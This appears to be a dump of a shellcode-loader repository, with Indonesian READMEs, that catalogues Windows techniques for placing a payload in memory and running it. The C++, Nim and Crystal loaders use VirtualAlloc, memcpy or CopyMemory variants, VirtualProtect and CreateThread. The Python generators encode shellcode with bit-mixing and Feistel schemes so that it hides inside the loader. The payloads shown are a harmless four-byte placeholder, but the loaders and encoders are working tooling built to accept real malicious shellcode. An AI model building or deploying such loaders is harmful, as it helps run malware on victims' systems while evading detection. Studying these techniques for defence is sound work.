"0.3.9" 9 | features = [ 10 | "errhandlingapi", 11 | "memoryapi", 12 | "processthreadsapi", 13 | "synchapi", 14 | "winbase", 15 | "winnt", 16 | ] -------------------------------------------------------------------------------- /windows/storage/stack/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Store shellcode as local data in stack (array). 4 | 5 | ### Overview 6 | 7 | Shellcode disimpan sebagai array of byte pada stack, dengan karakteristik adanya operasi push. Array dapat diakses melalui alamat memory relatif terhadap pointer. 8 | 9 | Catatan: eksekusi shellcode untuk sample akan menggunakan teknik menjalankan shellcode sebagai thread terpisah. -------------------------------------------------------------------------------- /windows/storage/stack/crystal/code.cr: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | # Archive of Reversing.ID 3 | # 4 | # storing payload in stack 5 | # 6 | # Run: 7 | # $ code.cr 8 | # 9 | # Technique: 10 | # - allocation: VirtualAlloc 11 | # - writing: memcpy 12 | # - permission: VirtualProtect 13 | # - execution: invoke directly 14 | 15 | # define PAGE_EXECUTE_READ because it's not defined in lib 16 | PAGE_EXECUTE_READ = 0x20 17 | 18 | # shellcode storage in stack 19 | payload = IO::Memory.new Bytes[ 0x90, 0x90, 0xCC, 0xC3 ] 20 | 21 | # allocate memory buffer for payload as READ-WRITE (no executable) 22 | runtime = LibC.VirtualAlloc(nil, payload.size, LibC::MEM_COMMIT | LibC::MEM_RESERVE, LibC::PAGE_READWRITE) 23 | 24 | # copy payload to the buffer 25 | Intrinsics.memcpy(runtime, payload.buffer, payload.size, false) 26 | 27 | # make buffer executable (R-X) 28 | LibC.VirtualProtect(runtime, payload.size, PAGE_EXECUTE_READ, out _) 29 | 30 | # execute the payload 31 | t = Proc(Int32).new(runtime, runtime) 32 | t.call -------------------------------------------------------------------------------- /windows/storage/stack/dart/pubspec.yaml: -------------------------------------------------------------------------------- 1 | name: shellcode_loader 2 | description: 3 | simple dart code to load shellcode at runtime 4 | version: 1.0.0 5 | 6 | environment: 7 | sdk: '>=2.10.0 <3.0.0' 8 | 9 | dependencies: 10 | ffi: ^1.0.0 -------------------------------------------------------------------------------- /windows/storage/stack/nim/code.nim: -------------------------------------------------------------------------------- 1 | #[ 2 | Shellcode Loader 3 | Archive of Reversing.ID 4 | 5 | storing payload in stack 6 | 7 | Compile: 8 | $ nim c code.nim 9 | 10 | Technique: 11 | - allocation: VirtualAlloc 12 | - permission: VirtualProtect 13 | - execution: CreateThread 14 | ]# 15 | import winim 16 | 17 | when isMainModule: 18 | var old_protect: DWORD = 0 19 | 20 | # shellcode storage in stack 21 | var payload: array[4, byte] = [byte 0x90, 0x90, 0xCC, 0xC3 ] 22 | 23 | # allocate memory buffer for payload as READ-WRITE (no executable) 24 | var runtime = VirtualAlloc(nil, payload.len, MEM_COMMIT, PAGE_READWRITE) 25 | 26 | # copy payload to the buffer 27 | copyMem(runtime, unsafeAddr payload, payload.len) 28 | 29 | # make buffer executable (R-X) 30 | var retval = VirtualProtect(runtime, payload.len, PAGE_EXECUTE_READ, addr old_protect) 31 | if retval != 0: 32 | var thread = CreateThread(nil, 0, cast[LPTHREAD_START_ROUTINE](runtime), nil, 0, nil) 33 | WaitForSingleObject(thread, -1) 34 | 35 | VirtualFree(runtime, payload.len, MEM_RELEASE) 36 | -------------------------------------------------------------------------------- /windows/storage/stack/rust/plain-winapi/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "shellcode-loader" 3 | version = "0.1.0" 4 | edition = "2021" 5 | authors = ["Satria Ady Pradana "] 6 | 7 | [dependencies.winapi] 8 | version = "0.3.9" 9 | features = [ 10 | "errhandlingapi", 11 | "memoryapi", 12 | "processthreadsapi", 13 | "synchapi", 14 | "winbase", 15 | "winnt", 16 | ] -------------------------------------------------------------------------------- /windows/storage/stack/rust/with-wrapper/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "shellcode-loader" 3 | version = "0.1.0" 4 | edition = "2021" 5 | authors = ["Satria Ady Pradana "] 6 | 7 | [dependencies] 8 | windows = { version = "0.35.0", features = [ 9 | "Win32_Foundation", 10 | "Win32_Security", 11 | "Win32_System_Memory" , 12 | "Win32_System_Threading", 13 | "Win32_System_WindowsProgramming" 14 | ]} -------------------------------------------------------------------------------- /windows/storage/stack/zig/build.zig: -------------------------------------------------------------------------------- 1 | const std = @import("std"); 2 | 3 | pub fn build(b: *std.build.Builder) void { 4 | // Standard target options allows the person running `zig build` to choose 5 | // what target to build for. Here we do not override the defaults, which 6 | // means any target is allowed, and the default is native. Other options 7 | // for restricting supported target set are available. 8 | const target = b.standardTargetOptions(.{}); 9 | 10 | // Standard release options allow the person running `zig build` to select 11 | // between Debug, ReleaseSafe, ReleaseFast, and ReleaseSmall. 12 | const mode = b.standardReleaseOptions(); 13 | 14 | const exe = b.addExecutable("zig", "src/main.zig"); 15 | exe.setTarget(target); 16 | exe.setBuildMode(mode); 17 | exe.install(); 18 | 19 | const run_cmd = exe.run(); 20 | run_cmd.step.dependOn(b.getInstallStep()); 21 | if (b.args) |args| { 22 | run_cmd.addArgs(args); 23 | } 24 | 25 | const run_step = b.step("run", "Run the app"); 26 | run_step.dependOn(&run_cmd.step); 27 | 28 | const exe_tests = b.addTest("src/main.zig"); 29 | exe_tests.setTarget(target); 30 | exe_tests.setBuildMode(mode); 31 | 32 | const test_step = b.step("test", "Run unit tests"); 33 | test_step.dependOn(&exe_tests.step); 34 | } 35 | -------------------------------------------------------------------------------- /windows/writing/compression/Decompress/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Writing shellcode to allocated memory. 4 | 5 | ### Overview 6 | 7 | Penyalinan shellcode menggunakan `Decompress`. 8 | 9 | ```c++ 10 | BOOL Decompress (DECOMPRESSOR_HANDLE DecompressorHandle, LPCVOID CompressedData, SIZE_T CompressedDataSize, PVOID UncompressedBuffer, SIZE_T UncompressedBufferSize, PSIZE_T UncompressedDataSize); 11 | 12 | BOOL CreateDecompressor (DWORD Algorithm, PCOMPRESS_ALLOCATION_ROUTINES AllocationRoutines, PDECOMPRESSOR_HANDLE DecompressorHandle); 13 | 14 | BOOL Compress (COMPRESSOR_HANDLE CompressorHandle, LPCVOID UncompressedData, SIZE_T UncompressedDataSize, PVOID CompressedBuffer, SIZE_T CompressedBufferSize, PSIZE_T CompressedDataSize); 15 | 16 | BOOL CreateCompressor (DWORD Algorithm, PCOMPRESS_ALLOCATION_ROUTINES AllocationRoutines, PCOMPRESSOR_HANDLE CompressorHandle); 17 | ``` 18 | 19 | ### Reference 20 | 21 | - [MSDN Decompress](https://docs.microsoft.com/en-us/windows/win32/api/compressapi/nf-compressapi-decompress) 22 | - [MSDN Compress](https://docs.microsoft.com/en-us/windows/win32/api/compressapi/nf-compressapi-compress) 23 | - [MSDN CreateDecompressor](https://docs.microsoft.com/en-us/windows/win32/api/compressapi/nf-compressapi-createdecompressor) 24 | - [MSDN CreateCompressor](https://docs.microsoft.com/en-us/windows/win32/api/compressapi/nf-compressapi-createcompressor) -------------------------------------------------------------------------------- /windows/writing/compression/Decompress/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/compression/Decompress/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/conversion/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | ### Overview 4 | 5 | Melakukan penyalahgunaan windows API untuk menyalin shellcode. 6 | 7 | Fungsi yang termasuk ke dalam kategori ini adalah fungsi yang melakukan konversi dari satu format ke format lain (misal, UTF-8 ke UNICODE). Umumnya fungsi memiliki argumen berupa input dan output buffer. 8 | 9 | Shellcode yang akan diproses oleh fungsi-fungsi ini haruslah disimpan dalam format yang telah ditentukan. Dengan demikian, setiap fungsi mungkin memerlukan generator untuk mengubah (konversi) shellcode menjadi bentuk yang dapat diterima sebagai input fungsi. -------------------------------------------------------------------------------- /windows/writing/conversion/RtlEthernetStringToAddress/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/conversion/RtlEthernetStringToAddress/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/conversion/RtlIpv4StringToAddress/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/conversion/RtlIpv4StringToAddress/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/conversion/RtlIpv4StringToAddressEx/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/conversion/RtlIpv4StringToAddressEx/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/conversion/RtlIpv6StringToAddress/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/conversion/RtlIpv6StringToAddress/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/conversion/UuidFromString/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/conversion/UuidFromString/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/conversion/endianness/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Writing shellcode to allocated memory. 4 | 5 | ### Overview 6 | 7 | Penyalinan shellcode menggunakan konversi endianness (little-endian dan big-endian byte order). 8 | 9 | Endian adalah urutan byte dari sebuah bilangan jika direpresentasikan di memory. Dalam representasi big-endian, penulisan byte diawali dari most-significant byte. Sementara little-endian diawali dari least-significant byte. 10 | 11 | Konversi antara little-endian dan big-endian dapat dilakukan melalui fungsi `ntoh` dan `hton`, dimana fungsi ntoh (network to host) mengasumsikan bilangan dalam big-endian dan akan dikonversi menjadi little endian. Sementara hton sebaliknya. 12 | 13 | 14 | ```c++ 15 | uint32_t htonl (uint32_t hostlong); 16 | uint64_t htonll (uint64_t hostlong); 17 | 18 | uint32_t ntohl (uint32_t netlong); 19 | uint64_t ntohll (uint64_t netlong); 20 | ``` 21 | 22 | ### Reference 23 | 24 | - [MSDN htonl](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-htonl) 25 | - [MSDN htonll](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-htonll) 26 | - [MSDN ntohl](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-ntohl) 27 | - [MSDN ntohll](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-ntohll) 28 | -------------------------------------------------------------------------------- /windows/writing/conversion/endianness/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/conversion/endianness/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/copy/CopyMemory/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Writing shellcode to allocated memory. 4 | 5 | ### Overview 6 | 7 | Penyalinan shellcode menggunakan `CopyMemory`. 8 | 9 | ```c++ 10 | void CopyMemory (PVOID Destination, const VOID *Source, SIZE_T Length); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN CopyMemory](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa366535(v=vs.85)) -------------------------------------------------------------------------------- /windows/writing/copy/CopyMemory/c++/code.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Shellcode Loader 3 | Archive of Reversing.ID 4 | 5 | writing shellcode to allocated memory 6 | 7 | Compile: 8 | $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp 9 | 10 | Technique: 11 | - allocation: VirtualAlloc 12 | - writing: CopyMemory 13 | - permission: VirtualProtect 14 | - execution: CreateThread 15 | */ 16 | 17 | #include 18 | #include 19 | #include 20 | 21 | int main () 22 | { 23 | void * runtime; 24 | BOOL retval; 25 | HANDLE th_shellcode; 26 | DWORD old_protect = 0; 27 | 28 | // shellcode storage in stack 29 | uint8_t payload [] = { 0x90, 0x90, 0xCC, 0xC3 }; 30 | uint32_t payload_len = 4; 31 | 32 | // allocate memory buffer for payload as READ-WRITE (no executable) 33 | runtime = VirtualAlloc (0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 34 | 35 | // copy payload to the buffer 36 | CopyMemory (runtime, payload, payload_len); 37 | 38 | // make buffer executable (R-X) 39 | retval = VirtualProtect (runtime, payload_len, PAGE_EXECUTE_READ, &old_protect); 40 | 41 | if (retval != 0) 42 | { 43 | th_shellcode = CreateThread (0, 0, (LPTHREAD_START_ROUTINE) runtime, 0, 0, 0); 44 | WaitForSingleObject (th_shellcode, -1); 45 | } 46 | 47 | return 0; 48 | } -------------------------------------------------------------------------------- /windows/writing/copy/CreatePipe/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Writing shellcode to allocated memory. 4 | 5 | ### Overview 6 | 7 | Penyalinan shellcode menggunakan mekanisme pipe (`CreatePipe`, `WriteFile`, dan `ReadFile`). 8 | 9 | ```c++ 10 | BOOL CreatePipe (PHANDLE hReadPipe, PHANDLE hWritePipe, LPSECURITY_ATTRIBUTES lpPipeAttributes, DWORD nSize); 11 | 12 | BOOL WriteFile (HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped); 13 | 14 | BOOL ReadFile (HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN CreatePipe](https://docs.microsoft.com/en-us/windows/win32/api/namedpipeapi/nf-namedpipeapi-createpipe) 20 | - [MSDN WriteFile](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-writefile) 21 | - [MSDN ReadFile](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-readfile) -------------------------------------------------------------------------------- /windows/writing/copy/MoveMemory/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Writing shellcode to allocated memory. 4 | 5 | ### Overview 6 | 7 | Penyalinan shellcode menggunakan `MoveMemory`. 8 | 9 | ```c++ 10 | void MoveMemory (PVOID Destination, const VOID *Source, SIZE_T Length); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN MoveMemory](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa366788(v=vs.85)) -------------------------------------------------------------------------------- /windows/writing/copy/MoveMemory/c++/code.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Shellcode Loader 3 | Archive of Reversing.ID 4 | 5 | writing shellcode to allocated memory 6 | 7 | Compile: 8 | $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp 9 | 10 | Technique: 11 | - allocation: VirtualAlloc 12 | - writing: MoveMemory 13 | - permission: VirtualProtect 14 | - execution: CreateThread 15 | */ 16 | 17 | #include 18 | #include 19 | #include 20 | 21 | int main () 22 | { 23 | void * runtime; 24 | BOOL retval; 25 | HANDLE th_shellcode; 26 | DWORD old_protect = 0; 27 | 28 | // shellcode storage in stack 29 | uint8_t payload [] = { 0x90, 0x90, 0xCC, 0xC3 }; 30 | uint32_t payload_len = 4; 31 | 32 | // allocate memory buffer for payload as READ-WRITE (no executable) 33 | runtime = VirtualAlloc (0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 34 | 35 | // copy payload to the buffer 36 | MoveMemory (runtime, payload, payload_len); 37 | 38 | // make buffer executable (R-X) 39 | retval = VirtualProtect (runtime, payload_len, PAGE_EXECUTE_READ, &old_protect); 40 | 41 | if (retval != 0) 42 | { 43 | th_shellcode = CreateThread (0, 0, (LPTHREAD_START_ROUTINE) runtime, 0, 0, 0); 44 | WaitForSingleObject (th_shellcode, -1); 45 | } 46 | 47 | return 0; 48 | } -------------------------------------------------------------------------------- /windows/writing/copy/NtWriteVirtualMemory/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Writing shellcode to allocated memory. 4 | 5 | ### Overview 6 | 7 | Penyalinan shellcode menggunakan `NtWriteVirtualMemory`. 8 | 9 | ```c++ 10 | NTSTATUS NtWriteVirtualMemory (HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [NTInternals NtWriteVirtualMemory](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtWriteVirtualMemory.html) -------------------------------------------------------------------------------- /windows/writing/copy/RtlMoveMemory/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Writing shellcode to allocated memory. 4 | 5 | ### Overview 6 | 7 | Penyalinan shellcode menggunakan `RtlMoveMemory`. 8 | 9 | ```c++ 10 | VOID RtlMoveMemory (VOID *Destination, const VOID *Source, SIZE_T Length); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN RtlMoveMemory](https://docs.microsoft.com/en-us/windows/win32/devnotes/rtlmovememory) -------------------------------------------------------------------------------- /windows/writing/copy/RtlMoveMemory/c++/code.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Shellcode Loader 3 | Archive of Reversing.ID 4 | 5 | writing shellcode to allocated memory 6 | 7 | Compile: 8 | $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp 9 | 10 | Technique: 11 | - allocation: VirtualAlloc 12 | - writing: RtlMoveMemory 13 | - permission: VirtualProtect 14 | - execution: CreateThread 15 | */ 16 | 17 | #include 18 | #include 19 | #include 20 | 21 | int main () 22 | { 23 | void * runtime; 24 | BOOL retval; 25 | HANDLE th_shellcode; 26 | DWORD old_protect = 0; 27 | 28 | // shellcode storage in stack 29 | uint8_t payload [] = { 0x90, 0x90, 0xCC, 0xC3 }; 30 | uint32_t payload_len = 4; 31 | 32 | // allocate memory buffer for payload as READ-WRITE (no executable) 33 | runtime = VirtualAlloc (0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 34 | 35 | // copy payload to the buffer 36 | RtlMoveMemory (runtime, payload, payload_len); 37 | 38 | // make buffer executable (R-X) 39 | retval = VirtualProtect (runtime, payload_len, PAGE_EXECUTE_READ, &old_protect); 40 | 41 | if (retval != 0) 42 | { 43 | th_shellcode = CreateThread (0, 0, (LPTHREAD_START_ROUTINE) runtime, 0, 0, 0); 44 | WaitForSingleObject (th_shellcode, -1); 45 | } 46 | 47 | return 0; 48 | } -------------------------------------------------------------------------------- /windows/writing/copy/WriteProcessMemory/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Writing shellcode to allocated memory. 4 | 5 | ### Overview 6 | 7 | Penyalinan shellcode menggunakan `WriteProcessMemory`. 8 | 9 | ```c++ 10 | BOOL WriteProcessMemory (HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T * lpNumberOfBytesWritten); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN WriteProcessMemory](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-writeprocessmemory) -------------------------------------------------------------------------------- /windows/writing/copy/memcpy/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Writing shellcode to allocated memory. 4 | 5 | ### Overview 6 | 7 | Penyalinan shellcode menggunakan `memcpy`. 8 | 9 | ```c++ 10 | void * memcpy (void * destination, const void * source, size_t num); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [C++ memcpy](https://www.cplusplus.com/reference/cstring/memcpy/) -------------------------------------------------------------------------------- /windows/writing/copy/memcpy/c++/code.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Shellcode Loader 3 | Archive of Reversing.ID 4 | 5 | writing shellcode to allocated memory 6 | 7 | Compile: 8 | $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp 9 | 10 | Technique: 11 | - allocation: VirtualAlloc 12 | - writing: memcpy 13 | - permission: VirtualProtect 14 | - execution: CreateThread 15 | */ 16 | 17 | #include 18 | #include 19 | #include 20 | 21 | int main () 22 | { 23 | void * runtime; 24 | BOOL retval; 25 | HANDLE th_shellcode; 26 | DWORD old_protect = 0; 27 | 28 | // shellcode storage in stack 29 | uint8_t payload [] = { 0x90, 0x90, 0xCC, 0xC3 }; 30 | uint32_t payload_len = 4; 31 | 32 | // allocate memory buffer for payload as READ-WRITE (no executable) 33 | runtime = VirtualAlloc (0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 34 | 35 | // copy payload to the buffer 36 | memcpy (runtime, payload, payload_len); 37 | 38 | // make buffer executable (R-X) 39 | retval = VirtualProtect (runtime, payload_len, PAGE_EXECUTE_READ, &old_protect); 40 | 41 | if (retval != 0) 42 | { 43 | th_shellcode = CreateThread (0, 0, (LPTHREAD_START_ROUTINE) runtime, 0, 0, 0); 44 | WaitForSingleObject (th_shellcode, -1); 45 | } 46 | 47 | return 0; 48 | } -------------------------------------------------------------------------------- /windows/writing/custom/bit-crossover/c++/generate.py: -------------------------------------------------------------------------------- 1 | # read shellcode from `shellcode.bin` and 2 | # generate the encoded shellcode 3 | 4 | import random 5 | 6 | # make sure n is 0 < n < 8 7 | rotl8 = lambda x,n: ((x << n) & 0xFF) | (x >> (8 - n)) 8 | rotr8 = lambda x,n: (x >> n) | ((x << (8 - n)) & 0xFF) 9 | 10 | high = lambda x: x & 0xF0 11 | low = lambda x: x & 0x0F 12 | 13 | cross = lambda L,R: (high(L) | low(R), high(R) | low(L)) 14 | 15 | 16 | with open("shellcode.bin", "rb") as f: 17 | shcode = f.read() 18 | shlen = len(shcode) 19 | 20 | # generate single byte key 21 | key = random.randrange(1,255) 22 | 23 | # make sure shellcode is even-length 24 | if shlen % 2 == 1: 25 | shcode += b"\x90" 26 | shlen += 1 27 | 28 | # encode shellcode 29 | enc_shcode = [key] 30 | idx = 0 31 | while idx < shlen: 32 | L = shcode[idx ] # LEFT 33 | R = shcode[idx + 1] # RIGHT 34 | 35 | # get half of each byte and cross 36 | L, R = cross(L, R) 37 | 38 | # rotate then XOR 39 | enc_shcode.append(rotl8(L, 3) ^ key) 40 | enc_shcode.append(rotr8(R, 3) ^ key) 41 | 42 | idx += 2 43 | 44 | # print as C-array 45 | print("{ ", end='') 46 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='') 47 | print(" }") -------------------------------------------------------------------------------- /windows/writing/custom/bit-crossover/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/custom/bit-crossover/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/custom/bit-rotation/c++/generate.py: -------------------------------------------------------------------------------- 1 | # read shellcode from `shellcode.bin` and 2 | # generate the encoded shellcode 3 | 4 | # make sure n is 0 < n < m 5 | rotl8 = lambda x,n: ((x << n) & 0xFF) | (x >> (8 - n)) 6 | rotr8 = lambda x,n: (x >> n) | ((x << (8 - n)) & 0xFF) 7 | 8 | rotl16 = lambda x,n: ((x << n) & 0xFFFF) | (x >> (16 - n)) 9 | rotr16 = lambda x,n: (x >> n) | ((x << (16 - n)) & 0xFFFF) 10 | 11 | make_word = lambda L,R: (L << 8) | R 12 | 13 | 14 | with open("shellcode.bin", "rb") as f: 15 | shcode = f.read() 16 | shlen = len(shcode) 17 | 18 | # encode shellcode 19 | if shlen % 2 == 1: 20 | shcode += b"\x90" 21 | shlen += 1 22 | 23 | # encode shellcode 24 | enc_shcode = [] 25 | idx = 0 26 | while idx < shlen: 27 | L = shcode[idx] 28 | R = shcode[idx + 1] 29 | 30 | # byte-level rotation 31 | L = rotl8(L, 3) 32 | R = rotr8(R, 7) 33 | 34 | # word-level rotation 35 | W = make_word(L, R) 36 | W = rotr16(W, 5) 37 | 38 | # split word into byte 39 | enc_shcode.append((W >> 8) & 0xFF) 40 | enc_shcode.append(W & 0xFF) 41 | 42 | idx += 2 43 | 44 | # print as C-array 45 | print("{ ", end='') 46 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='') 47 | print(" }") -------------------------------------------------------------------------------- /windows/writing/custom/bit-rotation/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/custom/bit-rotation/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/custom/bit-swap/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Transform the shellcode with custom algorithm. 4 | 5 | ### Overview 6 | 7 | `Bit-Mixing` adalah teknik atau proses manipulasi bit berupa pencampuran bit-bit dari blok data berbeda untuk menghasilkan blok data baru. Proses ini dilakukan dengan operasi `XOR`, `AND`, `OR`, `shifting`, dan `rotation`. 8 | 9 | Penerapan `Bit-Mixing` dalam shellcode digunakan haruslah merupakan proses yang dapat dibalikkan (invertible). 10 | 11 | `Swap` adalah variasi dari pencampuran bit dengan menukar bit-bit dari block data berbeda. Teknik ini dapat pula disebut sebagai `Cross-Over` yang lebih generik. 12 | 13 | Blok data terdiri atas dua komponen, `Left` dan `Right`. Ambil `N` bit dari posisi `P` dari `Left` dan `Right`, tukar kedua potongan bit tersebut. 14 | 15 | Berikut adalah algoritma yang diterapkan, ambil `N=3` bit dari posisi `P=2` dari `Left` dan `Right`: 16 | 17 | ``` 18 | extract(X) = X & 0x1E 19 | clear(x) = X & 0xE1 20 | 21 | L' = clear(L) | extract(R) 22 | R' = clear(R) | extract(L) 23 | ``` -------------------------------------------------------------------------------- /windows/writing/custom/bit-swap/c++/generate.py: -------------------------------------------------------------------------------- 1 | # read shellcode from `shellcode.bin` and 2 | # generate the encoded shellcode 3 | 4 | import random 5 | 6 | # make sure n is 0 < n < m 7 | rotl8 = lambda x,n: ((x << n) & 0xFF) | (x >> (8 - n)) 8 | rotr8 = lambda x,n: (x >> n) | ((x << (8 - n)) & 0xFF) 9 | 10 | extract = lambda X: X & 0x1E 11 | clear = lambda X: X & 0xE1 12 | 13 | cross = lambda L,R: (clear(L) | extract(R), clear(R) | extract(L)) 14 | 15 | 16 | with open("shellcode.bin", "rb") as f: 17 | shcode = f.read() 18 | shlen = len(shcode) 19 | 20 | # encode shellcode 21 | if shlen % 2 == 1: 22 | shcode += b"\x90" 23 | shlen += 1 24 | 25 | # generate single byte key 26 | key = random.randrange(1,255) 27 | 28 | # encode shellcode 29 | enc_shcode = [key] 30 | idx = 0 31 | while idx < shlen: 32 | L = shcode[idx] 33 | R = shcode[idx + 1] 34 | 35 | L, R = cross(L, R) 36 | 37 | # extract the bits and replace 38 | enc_shcode.append(rotl8(L, 3) ^ key) 39 | enc_shcode.append(rotr8(R, 3) ^ key) 40 | 41 | idx += 2 42 | 43 | # print as C-array 44 | print("{ ", end='') 45 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='') 46 | print(" }") -------------------------------------------------------------------------------- /windows/writing/custom/bit-swap/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/custom/bit-swap/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/custom/feistel/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Transform the shellcode with custom algorithm. 4 | 5 | ### Overview 6 | 7 | Menggunakan prinsip `Feistel Network` untuk mengenkripsi shellcode. Sebuah key disimpan sebagai byte pertama dan digunakan berulang untuk setiap operasi pada Feistel. 8 | 9 | Shellcode yang tersimpan memiliki format `[Key] [Encoded Shellcode]`. 10 | 11 | Penerapan Feistel Network dilakukan terhadap setiap pasang byte. Ambil 2 byte yakni L dan R. Pada setiap Feistel, lakukan perhitungan: 12 | 13 | ``` 14 | L[i + 1] = R[i] 15 | R[i + 1] = L[i] xor Key 16 | ``` -------------------------------------------------------------------------------- /windows/writing/custom/feistel/c++/generate.py: -------------------------------------------------------------------------------- 1 | # read shellcode from `shellcode.bin` and 2 | # generate the encoded shellcode 3 | 4 | import random 5 | 6 | with open("shellcode.bin", "rb") as f: 7 | shcode = f.read() 8 | shlen = len(shcode) 9 | 10 | # generate single byte key 11 | key = random.randrange(1, 255) 12 | 13 | # make sure shellcode is even-length 14 | if shlen % 2 == 1: 15 | shcode += b"\x00" 16 | shlen += 1 17 | 18 | # process in feistel network 19 | enc_shcode = [key] 20 | idx = 0 21 | while idx < shlen: 22 | l = shcode[idx] # LEFT 23 | r = shcode[idx+1] # RIGHT 24 | 25 | enc_shcode.append(r) 26 | enc_shcode.append(l ^ key) 27 | idx += 2 28 | 29 | # print as C-array 30 | print("{ ", end='') 31 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='') 32 | print(" }") -------------------------------------------------------------------------------- /windows/writing/custom/feistel/c++/shellcode.bin: -------------------------------------------------------------------------------- 